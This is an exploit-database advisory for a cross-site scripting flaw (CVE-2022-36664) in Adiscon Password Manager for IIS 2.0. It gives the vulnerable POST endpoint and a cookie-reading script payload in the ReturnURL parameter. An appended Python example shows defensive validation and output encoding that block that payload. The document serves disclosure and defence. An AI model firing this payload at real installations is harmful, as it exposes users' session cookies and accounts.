1337DAY-ID-38015 (zdt, VP4TR10T)
Oct 04, 2022 - 12:00 a.m.

Password Manager For IIS 2.0 Cross Site Scripting Vulnerability

2022-10-04 00:00:00
VP4TR10T
0day.today
180
password manager
iis
cross site scripting

EPSS: 0.001
Percentile: 47.3%

# Exploit Title: XSS
# Exploit Author: VP4TR10T
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
# Software Link: http://passwordmanager.adiscon.com/
# Version: Version 2.0
# Tested on: WINDOWS
# CVE: CVE-2022-36664

Affected URI (when trying to change user password):
POST /isapi/PasswordManager.dll HTTP/1.1

HTTP Payload (Affected Parameter):
ReturnURL=<script>alert(document.cookie)</script>

Cordially,
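A defensive check for the parameter named above, as an added example that is not part of the original advisory or the vendor's code: it validates `ReturnURL` in the urlencoded POST body before the request reaches the application, and HTML-encodes the value wherever it is written into a page. The allowlisted host `intranet.example.com` and all function names are assumptions; the advisory does not say how the DLL uses the value.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Assumption: hosts the password-change page may send users back to.
ALLOWED_HOSTS = {"intranet.example.com"}
# Characters with no place in a return URL that enable markup injection.
FORBIDDEN = set("<>\"'`\\")

def validate_return_url(value, allowed_hosts=ALLOWED_HOSTS):
    """Return (ok, reason) for one decoded ReturnURL value."""
    if any(c in FORBIDDEN or ord(c) < 0x20 for c in value):
        return False, "markup or control character"
    try:
        parts = urlsplit(value)
    except ValueError:
        return False, "unparseable URL"
    if not parts.scheme and not parts.netloc:
        # Same-site relative path such as /isapi/PasswordManager.dll
        if value.startswith("/"):
            return True, "relative path"
        return False, "not a rooted path"
    if parts.scheme.lower() not in ("http", "https"):
        return False, "scheme not allowed"
    if (parts.hostname or "").lower() not in allowed_hosts:
        return False, "host not allowlisted"
    return True, "allowlisted host"

def body_is_acceptable(body, allowed_hosts=ALLOWED_HOSTS):
    """Check every ReturnURL field in a urlencoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)  # also percent-decodes
    return all(validate_return_url(v, allowed_hosts)[0]
               for v in fields.get("ReturnURL", []))

def render_return_link(value):
    """Encode for an HTML attribute even when the value passed validation."""
    return '<a href="%s">Back</a>' % html.escape(value, quote=True)

if __name__ == "__main__":
    # Constructed sample bodies; the first carries the advisory's payload.
    for body in (
        "ReturnURL=<script>alert(document.cookie)</script>",
        "ReturnURL=%2Fisapi%2FPasswordManager.dll",
        "ReturnURL=https%3A%2F%2Fother.example%2F",
    ):
        print(body_is_acceptable(body), body)
```

Validation and output encoding are kept separate on purpose: the first narrows what the application accepts, the second keeps an accepted value from being interpreted as markup.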
